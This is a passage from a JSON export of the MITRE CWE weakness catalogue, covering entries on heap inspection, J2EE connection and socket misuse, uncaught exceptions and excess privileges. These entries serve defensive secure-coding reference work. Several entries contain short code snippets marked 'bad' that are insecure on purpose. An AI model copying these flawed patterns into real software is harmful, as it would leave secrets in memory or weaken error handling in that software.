exposed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"669","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Other"],"Impact":["Read Memory","Other"],"Note":"Be careful using vfork() and fork() in security sensitive code. The process state will not be cleaned up and will contain traces of data from past use."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-148"},"Intro_Text":"The following code calls realloc() on a buffer containing sensitive data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024);","xhtml:br":["","",""]}},"Body_Text":"There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data."}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Heap Inspection"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM03-C","Entry_Name":"Clear sensitive information stored in reusable resources returned for reuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Heap Inspection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Clear Heap Memory Before Release","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Clear Heap Memory Before Release (aka \'Heap Inspection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Clear Heap Memory Before Release (\'Heap Inspection\')","attr":{"@_Date":"2010-12-13"}}]}},"245":{"attr":{"@_ID":"245","@_Name":"J2EE Bad Practices: Direct Management of Connections","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application directly manages connections, instead of using the container\'s connection management facilities.","Extended_Description":"The J2EE standard forbids the direct management of connections. It requires that applications use the container\'s resource management facilities to obtain connections to resources. Every major web application container provides pooled database connection management as part of its resource management framework. Duplicating this functionality in an application is difficult and error prone, which is part of the reason it is forbidden under the J2EE standard.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, the class DatabaseConnection opens and manages a connection to a database for a J2EE application. The method openDatabaseConnection opens a connection to the database using a DriverManager to create the Connection object conn to the database specified in the string constant CONNECT_STRING.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DatabaseConnection {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private static final String CONNECT_STRING = \\"jdbc:mysql://localhost:3306/mysqldb\\";private Connection conn = null;public DatabaseConnection() {}public void openDatabaseConnection() {}// Member functions for retrieving database connection and accessing database...","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"conn = DriverManager.getConnection(CONNECT_STRING);","attr":{"@_style":"margin-left:10px;"}}}}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public class DatabaseConnection {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private static final String DB_DATASRC_REF = \\"jdbc:mysql://localhost:3306/mysqldb\\";private Connection conn = null;public DatabaseConnection() {}public void openDatabaseConnection() {}// Member functions for retrieving database connection and accessing database...","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (NamingException ex) {...}} catch (SQLException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"InitialContext ctx = new InitialContext();DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF);conn = datasource.getConnection();","xhtml:br":["","",""]}},"xhtml:br":""}}}}}}],"Body_Text":"The use of the DriverManager class to directly manage the connection to the database violates the J2EE restriction against the direct management of connections. The J2EE application should use the web application container\'s resource management facilities to obtain a connection to the database as shown in the following example."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: getConnection()"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: getConnection()","attr":{"@_Date":"2008-04-11"}}}},"246":{"attr":{"@_ID":"246","@_Name":"J2EE Bad Practices: Direct Use of Sockets","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application directly uses sockets instead of using framework method calls.","Extended_Description":{"xhtml:p":["The J2EE standard permits the use of sockets only for the purpose of communication with legacy systems when no higher-level protocol is available. Authoring your own communication protocol requires wrestling with difficult security issues.","Without significant scrutiny by a security expert, chances are good that a custom communication protocol will suffer from security problems. Many of the same issues apply to a custom implementation of a standard protocol. While there are usually more resources available that address security concerns related to implementing a standard protocol, these resources are also available to attackers."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use framework method calls instead of using sockets directly."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example opens a socket to connect to a remote server.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...Socket sock = null;try {} catch (Exception e) {}","xhtml:br":["","","","","","",""],"xhtml:i":["// Perform servlet tasks.","// Open a socket to a remote server (bad)."],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sock = new Socket(remoteHostname, 3000);...","xhtml:br":["","",""],"xhtml:i":"// Do something with the socket."}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},"Body_Text":"A Socket object is created directly within the Java servlet, which is a dangerous way to manage remote connections."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: Sockets"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: Sockets","attr":{"@_Date":"2008-04-11"}}}},"247":{"attr":{"@_ID":"247","@_Name":"DEPRECATED: Reliance on DNS Lookups in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350.","Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name, References"}],"Previous_Entry_Name":[{"#text":"Often Misused: Authentication","attr":{"@_Date":"2008-04-11"}},{"#text":"Reliance on DNS Lookups in a Security Decision","attr":{"@_Date":"2013-07-17"}},{"#text":"DEPRECATED (Duplicate): Reliance on DNS Lookups in a Security Decision","attr":{"@_Date":"2021-07-20"}}]}},"248":{"attr":{"@_ID":"248","@_Name":"Uncaught Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An exception is thrown from a function, but it is not caught.","Extended_Description":"When an exception is not caught, it may cause the program to crash or expose sensitive information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Read Application Data"],"Note":"An uncaught exception could cause the system to be placed in a state that could lead to a crash, exposure of sensitive information or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-39"},"Intro_Text":"The following example attempts to resolve a hostname.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"A DNS lookup failure will cause the Servlet to throw an exception."},{"Intro_Text":"The _alloca() function allocates memory on the stack. If an allocation request is too large for the available stack space, _alloca() throws an exception. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. _alloca() has been deprecated as of Microsoft Visual Studio 2005(R). It has been replaced with the more secure _alloca_s()."},{"Intro_Text":"EnterCriticalSection() can raise an exception, potentially causing the program to crash. Under operating systems prior to Windows 2000, the EnterCriticalSection() function can raise an exception in low memory situations. If the exception is not caught, the program will crash, potentially enabling a denial of service attack."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Exception Handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR06-J","Entry_Name":"Do not throw undeclared checked exceptions"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Often Misused: Exception Handling","attr":{"@_Date":"2008-01-30"}}}},"249":{"attr":{"@_ID":"249","@_Name":"DEPRECATED: Often Misused: Path Manipulation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because of name\\n\\tconfusion and an accidental combination of multiple\\n\\tweaknesses. Most of its content has been transferred to\\n\\tCWE-785.\\n\\n        This entry was deprecated for several reasons. The primary\\n        reason is over-loading of the \\"path manipulation\\" term and the\\n        description. The original description for this entry was the\\n        same as that for the \\"Often Misused: File System\\" item in the\\n        original Seven Pernicious Kingdoms paper. However, Seven\\n        Pernicious Kingdoms also has a \\"Path Manipulation\\" phrase that\\n        is for external control of pathnames (CWE-73), which is a\\n        factor in symbolic link following and path traversal, neither\\n        of which is explicitly mentioned in 7PK. Fortify uses the\\n        phrase \\"Often Misused: Path Manipulation\\" for a broader range\\n        of problems, generally for issues related to buffer\\n        management. Given the multiple conflicting uses of this term,\\n        there is a chance that CWE users may have incorrectly mapped\\n        to this entry.\\n\\n\\tThe second reason for deprecation is an implied combination of\\n\\tmultiple weaknesses within buffer-handling functions. The\\n\\tfocus of this entry was generally on the path-conversion\\n\\tfunctions and their association with buffer\\n\\toverflows. However, some of Fortify\'s Vulncat entries have the\\n\\tterm \\"path manipulation\\" but describe a non-overflow weakness\\n\\tin which the buffer is not guaranteed to contain the entire\\n\\tpathname, i.e., there is information truncation (see CWE-222\\n\\tfor a similar concept). A new entry for this non-overflow\\n\\tweakness may be created in a future version of CWE.","Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Importance":"Critical","Modification_Comment":"Described inconsistencies in this entry, which the CWE Content Team had already slated for deprecation."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Often Misused: Path Manipulation","attr":{"@_Date":"2009-07-27"}}}},"250":{"attr":{"@_ID":"250","@_Name":"Execution with Unnecessary Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.","Extended_Description":{"xhtml:p":["New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges.","Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":{"xhtml:p":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},{"Phase":"Installation"},{"Phase":"Architecture and Design","Note":{"xhtml:p":"If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe."}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Read Application Data","DoS: Crash, Exit, or Restart"],"Note":"An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11.7"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users."]},"Effectiveness_Notes":"Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial 